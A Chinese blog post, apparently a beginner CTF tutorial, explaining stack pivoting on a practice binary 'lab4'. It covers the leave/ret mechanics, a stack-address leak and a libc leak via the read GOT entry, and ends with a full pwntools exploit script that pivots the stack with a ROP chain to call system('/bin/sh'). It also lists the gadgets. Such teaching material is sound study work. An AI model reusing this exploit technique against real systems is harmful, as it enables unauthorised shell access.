PWN入门之栈迁移

最新推荐文章于 2024-03-13 21:25:44 发布
最新推荐文章于 2024-03-13 21:25:44 发布
阅读量2.8k 收藏 10
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681716/article/details/89278113
版权

实验目的

在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell?使用栈迁移的方法便能解决这个问题。在这里用lab4的文件来举例。

实验文件

链接:https://pan.baidu.com/s/1CW0eZM-yFNZfOfqlLnxqCw
提取码:tmo3

实验步骤

首先来介绍一下栈迁移是什么?
以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列栈操作:

push eip+4;
push ebp;
mov ebp,esp;

这些操作是用来保护现场,避免执行完函数后堆栈不平衡以及找不到之前的入口地址。
执行完函数后会进行一系列操作来还原现场

leave;
ret;

这边的leave就相当于进入函数栈操作的逆过程。
实际上,根据编译原理上介绍的leave和ret可以拆分成若干个move函数

leave  == mov esp,ebp;pop ebp;
ret   == pop eip #弹出栈顶数据给eip寄存器

这样如果能够控制栈空间到任意地址,那么我们就能利用ret来控制eip的数据(栈顶数据)。

此外,栈迁移主要是为了解决栈溢出可以溢出空间大小不足的问题。

现在我们用lab4文件来举例说明
首先对lab4进行检测,看看有没有保护机制
在这里插入图片描述
发现堆栈是no canary found ,所以我们可以通过栈进行填充字符来对栈进行操作。
对lab4用IDA进行静态分析
在这里插入图片描述

栈的溢出空间只有60h,比之前的几个例子小了很多,所以我们采用栈溢出的方法

在这里插入图片描述
这个地方是我们之后用来进行栈迁移操作的地方
在这里插入图片描述
通过对函数的源码进行分析,putchar(62)输出一个字符,我们需要对它进行接收。

p.recvuntil('>')

我们可以得出在read函数的地方我们可以进行在栈上填充字符的操作,从而对栈进行操作。在Puts函数的地方进行输出,但是碰巧的是输出的是栈上的内容(buf),因为栈上有用户数据、参数、rsp、rbp、返回地址等等。所以我们就可从这里进行泄露。
所以,我们直接将buf填充到rbp位置。

payload ='a'*0x50

因为puts是输出字符串的,字符串条件是\x00,所以Puts的结束条件也是\x00。(见下图)
输入字符一直填充到rbp下面为止,因为rbp存的是非0的内容,如果不到rbp下面停止的话,那么rbp的内容会当作字符串的一部分,所以会被输出出来。所以,我们利用这个特性来把rbp的地址(即stack的地址)输出出来。
在这里插入图片描述
在这里插入图片描述
我们通过填充,从而把stack的地址给泄露出来并打印出来。

stack=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(stack)

在这里插入图片描述
我们接下来要解决如何泄露出libc的基址,想泄露出libc的基址,首先要做的是先泄露出read的地址。

payload =p64(0xdeadbeef)+p64(pop_1)+p64(elf.got['read'])+p64(elf.plt['puts'])
payload+=p64(func_entry)+'a'*0x28
payload+=p64(stack-0x70)+p64(leave)

把payload填充进去
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
func_entry为sub_400676函数的入口地址。

构造rop链:

payload =p64(0xdeadbeef)+p64(pop_1)+p64(elf.got['read'])+p64(elf.plt['puts'])

在这里插入图片描述
从之前泄露出栈的基址为0x7ffd0ce4efc0,可以算出偏移量为0x70。
所以我们之后进行leave操作,把rbp往低地址移。因为leave相当于mov rsp,rbp;pop rbp;相当于把rbp位置上的内容给了rbp。
在这里插入图片描述

然后执行ret操作,相当于pop eip;因为我们之前在payload中是将leave指令的地址覆盖了ret地址。
在这里插入图片描述

所以我们再执行一次leave指令,相当于把rbp位置上的内容给了rbp。
在这里插入图片描述
在这里插入图片描述
之后就进行pop_1上的操作。
到puts函数中
在这里插入图片描述
最后把read的地址给泄露出来。

read=u64((p.recv()[5:11]).ljust(8,'\x00'))
print hex(read)
libc=LibcSearcher('read',read)
libcbase=read-libc.dump('read')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')

之后就在进行一次,我们就可以getshell。
在这里插入图片描述

from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal = ['gnome-terminal','-x','sh','-c']
debug=0
p=process('./lab4')
elf=ELF('./lab4')
if debug==1:
    pwnlib.gdb.attach(p,'b *0x4006ad')
leave =0x00000000004006BE
pop_1=0x0000000000400793
func_entry=0x0000000000400676
payload ='a'*0x50
p.recvuntil('>')
p.send(payload)
stack=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(stack)
################### one rop ##########################
payload =p64(0xdeadbeef)+p64(pop_1)+p64(elf.got['read'])+p64(elf.plt['puts'])
payload+=p64(func_entry)+'a'*0x28
payload+=p64(stack-0x70)+p64(leave)
p.recv()
p.send(payload)
################## leak libc #########################
if debug==0:
    read=u64((p.recv()[5:11]).ljust(8,'\x00'))
else:
    p.recv()
    p.recv()
    read=u64(p.recv(6).ljust(8,'\x00'))
print hex(read)
libc=LibcSearcher('read',read)
libcbase=read-libc.dump('read')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
################### two rop #############################
payload =p64(0xdeadbeef)+p64(pop_1)+p64(bin_sh)+p64(system)
payload+='a'*0x30
payload+=p64(stack-0xa0)+p64(leave)
p.send(payload)
p.interactive()
'''
0x000000000040078c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040078e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400790 : pop r14 ; pop r15 ; ret
0x0000000000400792 : pop r15 ; ret
0x000000000040078b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040078f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004005e0 : pop rbp ; ret
0x0000000000400793 : pop rdi ; ret
0x0000000000400791 : pop rsi ; pop r15 ; ret
0x000000000040078d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400509 : ret
0x00000000004007d0 : ret 0xfffe
'''
Han&Joe
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一道pwn入门的练习题
10-23
直接以一个非常简单的溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\溢出基础\格式化字符串漏洞等
迁移总结
最新发布
2302_79899078的博客
03-13 1019
迁移,orw
warmup pwn入门
02-11
pwn入门
迁移利用
2302_79899078的博客
02-26 610
但是我们面对只能控制一次返回地址的情况无法提前在bss段上写入rop链,而且写入的buf在里,我们并不知道地址,这里我们需要点新的思维了。这样rbp指向0x404020后可以再次读入,这时就可以利用puts函数打印出read函数的got地址,进而求出libc基址,这里利用迁移迁到bss段,这样就可以构造/bin/sh了,上代码。0x404020,因为0x4011FF+0x50=0x404020,而且0x404020是bss段上的地址,在ret到0x4011ff。这里先补充一点汇编知识。
计算机组成与结构复习整理(五)
lhx0525的博客
12-23 1663
指令系统与中央处理机组织指令系统基本概念指令格式一般格式按指令所包含的地址个数将指令划分指令长度寻址方式指令类型指令类型堆和堆存取方式中央处理机组织CPU的三种实现方式CPU中的主要寄存器单总线数据通路CPU四项基本功能CPU时序控制方式CPU控制流程一条完整指令的执行①Add (R3),R1②无条件转移指令的控制序列CPU性能设计 指令系统 基本概念 ①程序员用各种语言编写的程序最后要翻...
迁移(Stack Pivoting)进阶
hackzkaq的博客
11-17 170
迁移(Stack Pivoting)是一种在漏洞利用中常见的技术,用于改变的正常行为,特别是在缓冲区溢出等安全漏洞的情况下。迁移的核心在于修改指针(如 x86 架构中 ESP 寄存器)的值,使其指向攻击者控制的数据区域。在实际应用中,我们常通过劫持ebp和esp将劫持到bss段。在迁移十分关键的就是对leave,ret;这段gadget的利用pop ebp;ret == pop eip #弹出顶数据给eip寄存器。
Pwn入门基础
m0_49666584的博客
09-28 1万+
pwn主要是指通过程序本身的漏洞,编写利用脚本破解程序拿到系统的权限,这就要求我们对程序的各种函数,内存地址,堆空间,文件的结构有足够的了解。 0x01知识储备 c语言 python 汇编语言基础指令 Linux操作系统基本使用方法 c语言是当前比赛中pwn项目最常用的语言,IDA pro反汇编后得到的也是c语言的伪代码,所以c语言的熟练掌握会对程序的分析有很大帮助。 python主要用于编写exp(攻击)脚本,另外python有一个pwntools的pyth...
pwn零基础入门
weixin_45948183的博客
03-24 1万+
pwn零基础入门 很多初学者在初学pwn的时候,对pwn可能存在许多疑问,学什么,怎么学,今天和大家分享一下刚学pwn的一些资料的学习历程。 首先分享一下pwn的一系列学习资料 一、首先语言基础得打牢,1、汇编语言,《汇编语言—王爽》2、编程语言(C语言和python)C语言必须要会,题目大部分是用C语言写的,而且很多那些知识都要读libc的源代码。会python,exp用python写的,CTF...
进程调度API之init_waitqueue_entry
jason的笔记
12-19 1618
static inline void init_waitqueue_entry(wait_queue_t *q, struct task_struct *p) 是等待队列的基础适用函数之一,之前的博文已经给出过等待队列的用法了 这个函数的作用是用新进程来初始化队列 static inline void init_waitqueue_entry(wait_queue_t *q, struct tas
PWN入门分享
CK_0ff的博客
02-08 8053
文章目录什么是PWNPWN的前置技能可执行文件常见漏洞基础环境环境配置步骤溢出漏洞函数调用ELF文件文件保护机制CanaryNXPIE(ASLR)RELROlinux内存布局结语 pwn基础入门分享 什么是PWN? 以下内容摘自百度百科: ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了 。 ​ PWN也可译为二进制漏洞挖掘,在CTF比赛中,PWN题的目标是拿到flag,一般是在l
PWN入门之栈迁移-附件资源
03-02
PWN入门之栈迁移-附件资源
PWN——迁移
L2329794714的博客
08-29 1446
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 1392
更适合pwn入门新手体质的迁移教程
【Web狗自虐系列1】Pwn入门之初级ROP
就这样吧
07-06 847
式一种典型的后进先出的数据结构,其操作主要有压(push)与出(pop)两种操作压与出都是操作的顶高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的,用于保存函数调用信息和局部变量。程序的是从进程地址空间的高地址向低地址增长的。
pwn入门:详解gdb调试程序的常见命令
Bossfrank的博客
11-03 1488
本文主要以对一个程序的调试过程为例,介绍gdb调试器的常见命令,并直观的展示所谓“溢出”覆盖的效果以及大小端序的问题。涉及的知识点包括:pwn题目环境的部署、gdb调试的常见命令、大小端序的影响、简单解pwn题目脚本的编写。
看雪pwn入门--基础篇
泣当歌的计算机小白之路
03-28 2562
1.pwn理论基础  小菜: 什么是溢出 概念:在计算机中,当要表示的数据超出计算机使用的数据表示范围时,产生数据的溢出 原因:使用非类型安全的语言入C/C++等            以不可靠的方式存取或者复制内存缓冲区            编译器设置内存缓冲区太靠近关键数据结
从零开始入门pwn(一):pwn的介绍以及部分前置知识
热门推荐
m0_51466347的博客
12-06 3万+
目录 一.前言 二.pwn的介绍 pwn的定义 pwn的题目模式 前置知识 一.Linux 二.C语言 三.汇编语言 四.计算机组成原理 三.总结 一.前言 本人凭着一腔热血想要入门pwn,但却被pwn的高入门门槛泼了一次又一次冷水,趁着自己还记得,写一点心得为后来想入门的跟我一样的零基础新手提供一些帮助。 二.pwn的介绍 pwn的定义 想必很多想要入门的新手都已经通过各种各样的入门文章或视频了解了pwn的定义以及方向,但出于礼貌,我在这里还是再重复一下下。...
pwn printf 泄露地址
08-19
对于泄露地址,你可以利用格式化字符串漏洞来实现。首先,你需要找到一个可以输出中数据的地方,比如可以通过 `printf` 函数打印的地方。 然后,你可以构造一个格式化字符串,使用 `%x` 格式来读取中的数据。通过不断调整格式化字符串的位置和参数,你可以逐步泄露中的数据。 具体步骤如下: 1. 通过 `%p` 格式化字符串来获取 `printf` 函数在内存中的地址。 2. 分析布局,找到你感兴趣的上变量的相对偏移。 3. 构造格式化字符串,使用 `%x` 格式读取中数据,通过调整参数位置和偏移量,逐步泄露上的数据。 需要注意的是,在实际利用中,你可能需要多次尝试和调整格式化字符串的参数和偏移量,以便准确地泄露目标数据。另外,在漏洞利用过程中,请务必遵循合法和道德的原则,并且只在授权范围内进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值